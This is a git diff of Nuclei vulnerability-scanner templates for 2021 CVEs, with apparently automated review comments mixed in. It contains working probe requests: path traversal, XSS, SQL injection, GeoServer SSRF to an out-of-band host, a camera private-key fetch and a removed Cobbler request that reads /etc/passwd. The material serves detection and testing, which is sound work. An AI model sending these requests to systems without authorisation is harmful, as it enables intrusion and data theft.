@@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services. remediation: | Upgrade XStream to version 1.4.18 or later to mitigate the vulnerability. reference: @@ -20,13 +22,13 @@ info: cve-id: CVE-2021-39152 cwe-id: CWE-502 epss-score: 0.01242 - epss-percentile: 0.83916 + epss-percentile: 0.83992 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2021,xstream,ssrf,oast + tags: cve2021,cve,xstream,ssrf,oast,xstream_project http: - raw: @@ -71,4 +73,4 @@ http: part: interactsh_request words: - "User-Agent: Java" -# digest: 4a0a00473045022059d29cf3bbc247bdc5b81ac734f5e39219140f464dcb1a5361b547c8d20cf8dc022100b00b1a84c9f8088abefc22a57068d22f084f19ffa8f6623214f767a2422b7c45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022066c9ce151ee358bbe8455f9b617c8364fb827e63a620fb317affb71e693de0e102200a11031cf4158ec89817f2f860b0878dd4f93c94685a0e1e5d0a7ce837143d39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-39165.yaml b/nuclei-templates/CVE-2021/CVE-2021-39165.yaml index 72f7374e73..5384a41c12 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-39165.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-39165.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade Cachet to a version higher than 2.3.18 or apply the necessary patches provided by the vendor. reference: @@ -19,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-39165 cwe-id: CWE-287 - epss-score: 0.06078 - epss-percentile: 0.92723 + epss-score: 0.04786 + epss-percentile: 0.92528 cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: chachethq product: cachet shodan-query: http.favicon.hash:-1606065523 - tags: cve,cve2021,cachet,sqli + tags: cve,cve2021,cachet,sqli,chachethq http: - method: GET @@ -45,4 +47,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "pagination") && contains(body, "data")' condition: and -# digest: 4b0a00483046022100e727000c83a5eef402d4e172072111f605d1cc83482747edb572d3a8ae5b5c3e022100d88b907d2624f9f8a4572c5d5c344a47219a824c3f6dc5368d2b63bf6997d29c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204b3206034be2f774b8b91870d6386c1beadd44650a52a79e394ef377b8fd8a7e022100be385f84a4f30de70a9f03f2813758d984dbe67e2d2ddbdf8ffb06f772ea2772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-39211.yaml b/nuclei-templates/CVE-2021/CVE-2021-39211.yaml deleted file mode 100644 index 482d40423b..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-39211.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2021-39211 - -info: - name: GLPI 9.2/<9.5.6 - Information Disclosure - author: dogasantos,noraj - severity: medium - description: GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - reference: - - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825 - - https://github.com/glpi-project/glpi/releases/tag/9.5.6 - - https://nvd.nist.gov/vuln/detail/CVE-2021-39211 - remediation: This issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-39211 - cwe-id: CWE-668,CWE-200 - tags: cve,cve2021,glpi,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/ajax/telemetry.php" - - "{{BaseURL}}/glpi/ajax/telemetry.php" - - matchers-condition: and - matchers: - - type: word - words: - - '"uuid":' - - '"glpi":' - condition: and - - - type: status - status: - - 200 - -# Enhanced by md on 2023/02/01 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39322.yaml b/nuclei-templates/CVE-2021/CVE-2021-39322.yaml index 1974b6aa52..02e75158ab 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-39322.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-39322.yaml 
@@ -1,21 +1,36 @@ id: CVE-2021-39322 info: - name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting + name: WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting author: dhiyaneshDK severity: medium - description: "The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path." + description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. + remediation: | + Update to the latest version of the WordPress Easy Social Icons Plugin (3.0.9) or apply the vendor-provided patch to mitigate the vulnerability. 
reference: - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 - https://nvd.nist.gov/vuln/detail/CVE-2021-39322 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322 + - https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-39322 cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated - -requests: + epss-score: 0.00234 + epss-percentile: 0.60718 + cpe: cpe:2.3:a:cybernetikz:easy_social_icons:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: cybernetikz + product: easy_social_icons + framework: wordpress + tags: cve,cve2021,wordpress,wp-plugin,authenticated,wpscan,cybernetikz + +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -25,12 +40,10 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin.php//?page=cnss_social_icon_page HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -38,13 +51,12 @@ requests: words: - '' - - type: status - status: - - 200 - - type: word part: header words: - "text/html" -# Enhanced by mp on 2022/03/23 + - type: status + status: + - 200 +# digest: 4b0a00483046022100e9ee15a8abada7958e711aded015c8de9683c68642039c6bafcd88ef1ddceddf022100842ffd37deba2b63b5a7b9547f566896c8a2aa1054e7cc68f4d01ba1058be6e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-39433.yaml b/nuclei-templates/CVE-2021/CVE-2021-39433.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-39433.yaml rename to nuclei-templates/CVE-2021/CVE-2021-39433.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-40149.yaml b/nuclei-templates/CVE-2021/CVE-2021-40149.yaml index 9d9700aaaf..22c1d83310 100644 
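Review bot: The `name:` line loses the "Reflected" qualifier while the `description:` still states this is reflected cross-site scripting, and the rebuilt `tags:` line still carries no `xss` tag although every other XSS template in this commit does; suggested `name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting` and `tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan,cybernetikz`. The removal of `cookie-reuse: true` in the second hunk has the same engine-version dependency raised on the CVE-2021-36873 hunk above. The first hunk starts on the previous line.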
--- a/nuclei-templates/CVE-2021/CVE-2021-40149.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40149.yaml @@ -1,9 +1,8 @@ id: CVE-2021-40149 - info: name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure author: For3stCo1d - severity: medium + severity: high description: | Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability. reference: @@ -11,20 +10,15 @@ info: - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.9 cve-id: CVE-2021-40149 - cwe-id: CWE-552 metadata: shodan-query: http.title:"Reolink" verified: "true" tags: cve,cve2021,reolink,camera,iot,exposure,unauth - requests: - method: GET path: - "{{BaseURL}}/self.key" - matchers-condition: and matchers: - type: word @@ -32,7 +26,6 @@ requests: - "-----BEGIN RSA PRIVATE KEY-----" - "-----END RSA PRIVATE KEY----" condition: and - - type: status status: - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40150.yaml b/nuclei-templates/CVE-2021/CVE-2021-40150.yaml new file mode 100644 index 0000000000..7c25b1aef3 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-40150.yaml 
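Review bot: `severity` is raised from medium to high while the `cvss-metrics`, `cvss-score: 5.9` and `cwe-id: CWE-552` lines are deleted instead of updated, so the new severity has no supporting classification and contradicts the only score the record ever had. Either restore the vector with the value that justifies high, or keep `severity: medium` until it is re-scored; dropping the metrics is the one option that leaves consumers unable to check. `verified: "true"` is still a quoted string here, whereas the rest of this commit normalises to `verified: true`.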
@@ -0,0 +1,33 @@ +id: CVE-2021-40150 +info: + name: Reolink E1 Zoom Camera - Information Disclosure + author: For3stCo1d + severity: medium + description: | + The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. + An unauthenticated attacker can abuse this with network-level access to the camera to download the entire NGINX/FastCGI configurations. + reference: + - https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt + - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40150 + classification: + cve-id: CVE-2021-40150 + metadata: + verified: true + shodan-query: http.title:"Reolink" + tags: cve,cve2021,reolink,camera,exposure,iot +requests: + - method: GET + path: + - "{{BaseURL}}/conf/nginx.conf" + matchers-condition: and + matchers: + - type: word + words: + - "server" + - "listen" + - "fastcgi" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40323.yaml b/nuclei-templates/CVE-2021/CVE-2021-40323.yaml deleted file mode 100644 index 77e64baeb8..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40323.yaml +++ /dev/null 
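Review bot: The new CVE-2021-40150 template's `classification:` block contains only `cve-id`; a `cwe-id` (information exposure is CWE-200) and the `cvss-metrics`/`cvss-score` from the CVE record should be filled in so the `severity: medium` line is backed by something. As with the other new files in this commit, it uses `requests:` without `max-request: 1` while existing templates are being migrated to `http:`. The word matcher relies on `fastcgi` for specificity since `server` and `listen` appear in many responses; consider also asserting the body is not `text/html` so an error page containing those words is not reported as a configuration leak.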
@@ -1,99 +0,0 @@ -id: CVE-2021-40323 - -info: - name: Cobbler <3.3.0 Remote Code Execution - severity: critical - author: c-sh0 - description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method. - reference: - - https://github.com/cobbler/cobbler/releases/tag/v3.3.0 - - https://github.com/cobbler/cobbler/issues/2795 - - https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-40323 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-40323 - cwe-id: CWE-94 - tags: cve,cve2021,cobbler,rce - -requests: - - raw: - - | - POST {{BaseURL}}/cobbler_api HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - - - - find_profile - - - - - - name - - * - - - - - - - - - - | - POST {{BaseURL}}/cobbler_api HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - - - - generate_script - - - - {{profile}} - - - - - - - - - - /etc/passwd - - - - - - extractors: - - type: regex - name: profile - internal: true - group: 1 - regex: - - '(.*?)' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - 'text/xml' - - - type: regex - regex: - - "root:.*:0" - - "bin:.*:1" - - "nobody:.*:99" - condition: or - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40661.yaml b/nuclei-templates/CVE-2021/CVE-2021-40661.yaml index bf86ea439c..c1fffcff14 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40661.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40661.yaml 
@@ -6,23 +6,34 @@ info: severity: high description: | IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the system. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate the vulnerability and ensure that the device is not accessible from untrusted networks. reference: - https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661 - https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm - https://nvd.nist.gov/vuln/detail/CVE-2021-40661 + - https://github.com/Live-Hack-CVE/CVE-2021-40661 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-40661 cwe-id: CWE-22 + epss-score: 0.01137 + epss-percentile: 0.84411 + cpe: cpe:2.3:o:mt:ind780_firmware:7.2.10:*:*:*:*:*:*:* metadata: - google-query: inurl:excalweb.dll + verified: true + max-request: 1 + vendor: mt + product: ind780_firmware shodan-query: IND780 - verified: "true" - tags: cve,cve2021,ind780,lfi + google-query: inurl:excalweb.dll + tags: cve2021,cve,ind780,lfi,mt -requests: +http: - method: GET path: - "{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini" 
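Review bot: The new `cpe` line pins the product to `ind780_firmware:7.2.10`, while the description a few lines above names both Build 8.0.07 and Version 7.2.10 as affected, so anything keyed on the CPE would miss the newer build; `cpe: cpe:2.3:o:mt:ind780_firmware:*:*:*:*:*:*:*:*` covers both. The reference appended at the end of the list (`Live-Hack-CVE/CVE-2021-40661`) is an automated mirror rather than a primary source; the vendor page and NVD entry already in the list carry the same information, so it adds a link without adding evidence. The added `remediation` text is reasonable, and `max-request: 1` agrees with the single `path` entry.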
@@ -39,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2023/01/15 +# digest: 4b0a00483046022100b7e2b1761ea31f96096ee954d371b91df663bcfa45c8f773a58b8f5f509c9e11022100a7cd7929229cc6298d1bd75e2f8a31d62e513dfae2e7c5fc750a14a9a971e44c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40822.yaml b/nuclei-templates/CVE-2021/CVE-2021-40822.yaml index cb5258cfc8..bb7e248c57 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40822.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40822.yaml 
@@ -1,59 +1,42 @@ id: CVE-2021-40822 - info: name: Geoserver - Server-Side Request Forgery - author: For3stCo1d,aringo-bf + author: For3stCo1d severity: high description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. - remediation: | - Apply the latest security patches or updates provided by the Geoserver project to mitigate the SSRF vulnerability. reference: - https://gccybermonks.com/posts/cve-2021-40822/ - https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3 - https://github.com/geoserver/geoserver/releases - https://nvd.nist.gov/vuln/detail/CVE-2021-40822 - - https://osgeo-org.atlassian.net/browse/GEOS-10229 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-40822 cwe-id: CWE-918 - epss-score: 0.68366 - epss-percentile: 0.97892 - cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: osgeo - product: geoserver - shodan-query: title:"GeoServer" fofa-query: app="GeoServer" - tags: cve2021,cve,ssrf,geoserver,osgeo - -http: + verified: "true" + tags: cve,cve2021,ssrf,geoserver +requests: - raw: - | POST /geoserver/TestWfsPost HTTP/1.1 - Host: oast.pro + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password= - + form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password= matchers-condition: and matchers: - type: word - part: body + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "Interactsh" - + - "http" - type: word - part: header words: - - "text/html" - + - "" - type: status status: - 200 -# digest: 
4a0a0047304502210097677b11bc4965e4caadab5f77264e9a0e4a19a059a4c5e5269a6aff5c98b76e022015b1d85cb9b06c62a60bfe3cf6f89fb25cc22fb593d23eb92e858bc117b5b1a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40908.yaml b/nuclei-templates/CVE-2021/CVE-2021-40908.yaml index c2cc98fac2..9fdb9e476a 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40908.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40908.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application. reference: @@ -17,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40908 cwe-id: CWE-89 - epss-score: 0.02031 - epss-percentile: 0.87677 + epss-score: 0.0161 + epss-percentile: 0.8612 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: purchase_order_management_system_project product: purchase_order_management_system - tags: cve,cve2021,sqli,purchase-order,poms + tags: cve2021,cve,sqli,purchase-order,poms,purchase_order_management_system_project http: - raw: 
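Review bot: The second word matcher on the new side, `- type: word` / `words:` / `- ""`, has lost its `part: header` and now matches an empty string, which every response satisfies; in this rendering the value may be an HTML token stripped by the page, so confirm against the source, but as shown the `matchers-condition: and` reduces to "interactsh saw an http callback and the status was 200". The same hunk reverts `http:` to `requests:` and drops the `impact`, `remediation`, `epss-*`, `cpe`, `max-request` and `osgeo` vendor metadata that the neighbouring templates in this commit are gaining, so this file moves in the opposite direction from the rest of the change and looks like an older copy being synced over a newer one. Replacing the hard-coded `oast.pro` in the `Host:` header and `url=` target with `{{Hostname}}` and `{{interactsh-url}}` is the one part of the new side that is an improvement on its own.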
@@ -44,4 +46,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "status\":\"incorrect\"")' condition: and -# digest: 4a0a00473045022020c0e0e367267c415cde4d2d7bf034c4c380c33da6c258aca5ba577dbe2846b4022100b8b166f606dd0b7f8fb37762e0c2599b524c9986a71ceeb98d2a18c5b5a733b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e6f6b36eba8496c9a593169aab8d1c95a86ab766f8a7b6ff30f96d2d5d78e45b022054ee34ff5a00ffd01500719d1a15661146d35eb17a7224a0a24f38c5519de6bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40968.yaml b/nuclei-templates/CVE-2021/CVE-2021-40968.yaml index 2e1276f60e..6e545de39b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40968.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40968.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ @@ -18,7 +20,7 @@ info: cve-id: CVE-2021-40968 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.5131 + epss-percentile: 0.50482 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: 
@@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cb1467e19ec91d0e8c659d9f8d7af32d19b915a3c3edc56b49054f9804ef2c56022100c7afc228ec95811ae51a35552c2ce7c5018b92d63e597f996f3da83532275b5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206dba6a431dc30930ad050e7f834b22acc257437f9ac33a3d996fcc702e3aa15802205f6714478f7cfa16218ab6510bd7d4dd9093ad29ce7722c5b0e8a4fee8aa45f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40969.yaml b/nuclei-templates/CVE-2021/CVE-2021-40969.yaml index 35c7920035..3c7e768608 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40969.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40969.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the firstname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, data theft, or other attacks. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ @@ -18,7 +20,7 @@ info: cve-id: CVE-2021-40969 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.5131 + epss-percentile: 0.51305 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: 
@@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220343caf4ff44121d860f70a36cddef3e458db41be865e23088b2e0979a270e4f802210086c4ee3aa1846c4212779b5236c4f1c62191a176917beb12d8ee502f7521013c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207085af68079243c3f162206c08f5bfc2c11e35d92aa24107a9a989d42674176e022100c72473d3a42f86cc061bb8fec67780356ca1769c35fa52f444ff3316f6674779:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40970.yaml b/nuclei-templates/CVE-2021/CVE-2021-40970.yaml index 2e0cac0301..43da6c18c3 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40970.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40970.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ @@ -18,7 +20,7 @@ info: cve-id: CVE-2021-40970 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.5131 + epss-percentile: 0.50482 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: 
@@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204852db01ffe89609830cb822e369fbf86f2e398f8e1fd62af14366e76e0fdf6202204144997b38703c3e8f9d6f55c8ba3c51cf9a02be65658c8593e9e9309328e6b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bacabdca74f9c9fbae5381ac0a8ef79f2c5702cb4c709e6194bfeb4213c503e902203c7a3b7376f619852ee754a987330645eee544784fe9acd88459eb72f7029e7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40971.yaml b/nuclei-templates/CVE-2021/CVE-2021-40971.yaml index 309a1c194c..88dd6a8150 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40971.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40971.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword1 parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ @@ -18,7 +20,7 @@ info: cve-id: CVE-2021-40971 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.5131 + epss-percentile: 0.50482 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: 
@@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220365e856059e373dde8aa21cf3985f7b6e3211dcb4cfea108fd08ca6534dc6c9e02200a2a69478ce9b9fc3dbcdc4e778ec8d5d775435806f0440ba6168659e2184563:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220018fbd142442b644347ff23fb7ff5fae090cbd6180d4bae07df55618e3576c9002204f369d1032ff131cbf6c6bd4b8e1394b6b238418b68862884580300adb61e42b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40972.yaml b/nuclei-templates/CVE-2021/CVE-2021-40972.yaml index 76076f284b..3221950a2a 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40972.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40972.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ @@ -18,7 +20,7 @@ info: cve-id: CVE-2021-40972 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.5131 + epss-percentile: 0.50482 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb + tags: cve,cve2021,xss,spotweb,spotweb_project http: - raw: 
